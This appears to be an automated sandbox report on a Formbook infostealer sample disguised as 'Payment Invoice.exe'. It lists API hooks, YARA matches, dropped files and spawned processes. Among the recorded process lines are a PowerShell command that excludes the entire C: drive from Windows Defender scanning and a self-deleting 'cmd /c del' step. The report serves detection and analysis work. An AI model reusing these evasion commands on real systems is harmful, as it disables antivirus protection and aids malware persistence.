                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01709A80 NtOpenDirectoryObject,
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01709560 NtWriteFile,
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0170AD30 NtSetContextThread,
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01709520 NtWaitForSingleObject,
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_017095F0 NtQueryInformationFile,
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0170A770 NtOpenThread,
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01709770 NtSetInformationFile,
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01709760 NtOpenProcess,
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01709730 NtQueryVirtualMemory,
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0170A710 NtOpenProcessToken,
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01709FE0 NtCreateMutant,
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01709670 NtQueryInformationProcess,
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01709650 NtQueryValueKey,
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01709610 NtEnumerateValueKey,
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_017096D0 NtCreateKey,
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03729A50 NtCreateFile,LdrInitializeThunk,
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03729910 NtAdjustPrivilegesToken,LdrInitializeThunk,
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037299A0 NtCreateSection,LdrInitializeThunk,
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03729860 NtQuerySystemInformation,LdrInitializeThunk,
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03729840 NtDelayExecution,LdrInitializeThunk,
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03729710 NtQueryInformationToken,LdrInitializeThunk,
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03729FE0 NtCreateMutant,LdrInitializeThunk,
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03729780 NtMapViewOfSection,LdrInitializeThunk,
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03729660 NtAllocateVirtualMemory,LdrInitializeThunk,
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03729650 NtQueryValueKey,LdrInitializeThunk,
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037296E0 NtFreeVirtualMemory,LdrInitializeThunk,
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037296D0 NtCreateKey,LdrInitializeThunk,
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03729540 NtReadFile,LdrInitializeThunk,
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037295D0 NtClose,LdrInitializeThunk,
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03729B00 NtSetValueKey,
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0372A3B0 NtGetContextThread,
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03729A20 NtResumeThread,
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03729A10 NtQuerySection,
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03729A00 NtProtectVirtualMemory,
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03729A80 NtOpenDirectoryObject,
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03729950 NtQueueApcThread,
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037299D0 NtCreateProcessEx,
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0372B040 NtSuspendThread,
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03729820 NtEnumerateKey,
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037298F0 NtReadVirtualMemory,
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037298A0 NtWriteVirtualMemory,
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0372A770 NtOpenThread,
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03729770 NtSetInformationFile,
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03729760 NtOpenProcess,
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03729730 NtQueryVirtualMemory,
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0372A710 NtOpenProcessToken,
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037297A0 NtUnmapViewOfSection,
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03729670 NtQueryInformationProcess,
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03729610 NtEnumerateValueKey,
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03729560 NtWriteFile,
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0372AD30 NtSetContextThread,
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03729520 NtWaitForSingleObject,
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037295F0 NtQueryInformationFile,
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_02E4A060 NtClose,
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_02E4A110 NtAllocateVirtualMemory,
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_02E49FE0 NtReadFile,
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_02E49F30 NtCreateFile,
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_02E4A10A NtAllocateVirtualMemory,
                      Source: C:\Users\user\Desktop\Payment Invoice.exeCode function: 1_2_00559C5F
                      Source: C:\Users\user\Desktop\Payment Invoice.exeCode function: 1_2_0055A067
                      Source: C:\Users\user\Desktop\Payment Invoice.exeCode function: 1_2_00CE0640
                      Source: C:\Users\user\Desktop\Payment Invoice.exeCode function: 1_2_00CE0998
                      Source: C:\Users\user\Desktop\Payment Invoice.exeCode function: 1_2_00CE1768
                      Source: C:\Users\user\Desktop\Payment Invoice.exeCode function: 1_2_00CE1BF1
                      Source: C:\Users\user\Desktop\Payment Invoice.exeCode function: 1_2_00CE09B2
                      Source: C:\Users\user\Desktop\Payment Invoice.exeCode function: 1_2_00CE1819
                      Source: C:\Users\user\Desktop\Payment Invoice.exeCode function: 1_2_06E12F90
                      Source: C:\Users\user\Desktop\Payment Invoice.exeCode function: 1_2_06E17C7D
                      Source: C:\Users\user\Desktop\Payment Invoice.exeCode function: 1_2_06E18B10
                      Source: C:\Users\user\Desktop\Payment Invoice.exeCode function: 1_2_06E12098
                      Source: C:\Users\user\Desktop\Payment Invoice.exeCode function: 1_2_06E18E28
                      Source: C:\Users\user\Desktop\Payment Invoice.exeCode function: 1_2_06E17C96
                      Source: C:\Users\user\Desktop\Payment Invoice.exeCode function: 1_2_06E1245C
                      Source: C:\Users\user\Desktop\Payment Invoice.exeCode function: 1_2_06E132C0
                      Source: C:\Users\user\Desktop\Payment Invoice.exeCode function: 1_2_06E18BB7
                      Source: C:\Users\user\Desktop\Payment Invoice.exeCode function: 1_2_06E120D2
                      Source: C:\Users\user\Desktop\Payment Invoice.exeCode function: 1_2_06E12088
                      Source: C:\Users\user\Desktop\Payment Invoice.exeCode function: 1_2_06E14841
                      Source: C:\Users\user\Desktop\Payment Invoice.exeCode function: 1_2_06E14850
                      Source: C:\Users\user\Desktop\Payment Invoice.exeCode function: 1_2_06E13037
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 13_2_001B9C5F
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 13_2_001BA067
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_00401030
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0041E96E
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_00401174
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0041E1FF
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0041D500
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_00402D90
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_00409E2B
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_00409E30
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0041DFCE
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_00402FB0
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_00C9A067
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_00C99C5F
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016E4120
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016CF900
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0179E824
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01781002
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_017928EC
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F20A0
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_017920A8
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016DB090
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01792B28
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_017803DA
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0178DBD2
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016FEBB0
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0177FA2B
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_017922AE
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01791D55
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016C0D20
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01792D07
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016DD5E0
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_017925DD
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F2581
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0178D466
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016D841F
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01791FF1
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0179DFCE
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016E6E30
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0178D616
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01792EF7
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037B2B28
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037A03DA
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037ADBD2
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0371EBB0
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037B22AE
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03704120
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036EF900
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037BE824
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037A1002
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037B28EC
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037120A0
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037B20A8
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036FB090
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037B1FF1
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037BDFCE
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03706E30
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037AD616
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037B2EF7
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037B1D55
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036E0D20
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037B2D07
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036FD5E0
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037B25DD
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03712581
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037AD466
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036F841F
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_02E4E1FF
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_02E39E2B
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_02E39E30
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_02E4DFCE
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_02E32FB0
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_02E32D90
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_02E4D500
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: String function: 016CB150 appears 45 times
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: String function: 036EB150 appears 45 times
                      Source: Payment Invoice.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: Payment Invoice.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: Payment Invoice.exe, 00000001.00000002.731308323.0000000007020000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRjqqecywmhbkk.dll" vs Payment Invoice.exe
                      Source: Payment Invoice.exe, 00000001.00000002.720984105.00000000039B9000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs Payment Invoice.exe
                      Source: Payment Invoice.exe, 00000001.00000002.719312419.0000000000D1A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Payment Invoice.exe
                      Source: Payment Invoice.exe, 00000001.00000002.717404896.000000000055E000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameMstkztz.exeH vs Payment Invoice.exe
                      Source: Payment Invoice.exe, 00000001.00000002.730879897.0000000006E30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs Payment Invoice.exe
                      Source: Payment Invoice.exe, 0000000D.00000002.714359819.00000000001BE000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameMstkztz.exeH vs Payment Invoice.exe
                      Source: Payment Invoice.exe, 0000000E.00000002.782780518.00000000017BF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Payment Invoice.exe
                      Source: Payment Invoice.exe, 0000000E.00000002.783600044.0000000003426000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameWWAHost.exej% vs Payment Invoice.exe
                      Source: Payment Invoice.exe, 0000000E.00000000.715328773.0000000000C9E000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameMstkztz.exeH vs Payment Invoice.exe
                      Source: Payment Invoice.exeBinary or memory string: OriginalFilenameMstkztz.exeH vs Payment Invoice.exe
                      Source: Payment Invoice.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                      Source: 00000015.00000002.908858875.0000000000380000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                      Source: 00000015.00000002.908858875.0000000000380000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                      Source: 00000001.00000002.721973230.0000000003C24000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                      Source: 00000001.00000002.721973230.0000000003C24000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                      Source: 0000000E.00000002.781657076.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                      Source: 0000000E.00000002.781657076.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                      Source: 00000015.00000002.910248106.0000000002E30000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                      Source: 00000015.00000002.910248106.0000000002E30000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                      Source: 0000000E.00000002.782477108.0000000001660000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                      Source: 0000000E.00000002.782477108.0000000001660000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                      Source: 0000000E.00000002.782306537.0000000001230000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                      Source: 0000000E.00000002.782306537.0000000001230000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                      Source: 00000001.00000002.721408933.0000000003AD1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                      Source: 00000001.00000002.721408933.0000000003AD1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                      Source: 14.2.Payment Invoice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                      Source: 14.2.Payment Invoice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                      Source: 1.2.Payment Invoice.exe.3ad1990.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                      Source: 1.2.Payment Invoice.exe.3ad1990.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                      Source: 14.2.Payment Invoice.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                      Source: 14.2.Payment Invoice.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                      Source: Payment Invoice.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: Payment Invoice.exe.1.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@13/8@2/1
                      Source: C:\Users\user\Desktop\Payment Invoice.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payment Invoice.exe.logJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6892:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6728:120:WilError_01
                      Source: C:\Users\user\Desktop\Payment Invoice.exeFile created: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeJump to behavior
                      Source: Payment Invoice.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\Payment Invoice.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\Payment Invoice.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: Payment Invoice.exeVirustotal: Detection: 33%
                      Source: Payment Invoice.exeReversingLabs: Detection: 29%
                      Source: C:\Users\user\Desktop\Payment Invoice.exeFile read: C:\Users\user\Desktop\Payment Invoice.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\Payment Invoice.exe 'C:\Users\user\Desktop\Payment Invoice.exe'
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'powershell' Add-MpPreference -ExclusionPath C:\
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess created: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe C:\Users\user\AppData\Local\Temp\Payment Invoice.exe
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess created: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe C:\Users\user\AppData\Local\Temp\Payment Invoice.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
                      Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\Payment Invoice.exe'
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'powershell' Add-MpPreference -ExclusionPath C:\
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess created: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe C:\Users\user\AppData\Local\Temp\Payment Invoice.exe
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess created: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe C:\Users\user\AppData\Local\Temp\Payment Invoice.exe
                      Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\Payment Invoice.exe'
                      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{317D06E8-5F24-433D-BDF7-79CE68D8ABC2}\InProcServer32
                      Source: C:\Users\user\Desktop\Payment Invoice.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: Payment Invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Payment Invoice.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: WWAHost.pdb source: Payment Invoice.exe, 0000000E.00000002.783465280.0000000003370000.00000040.00000001.sdmp
                      Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000F.00000000.750469066.0000000005A00000.00000002.00000001.sdmp
                      Source: Binary string: WWAHost.pdbUGP source: Payment Invoice.exe, 0000000E.00000002.783465280.0000000003370000.00000040.00000001.sdmp
                      Source: Binary string: wntdll.pdbUGP source: Payment Invoice.exe, 0000000E.00000002.782780518.00000000017BF000.00000040.00000001.sdmp, WWAHost.exe, 00000015.00000002.910484739.00000000036C0000.00000040.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: Payment Invoice.exe, WWAHost.exe
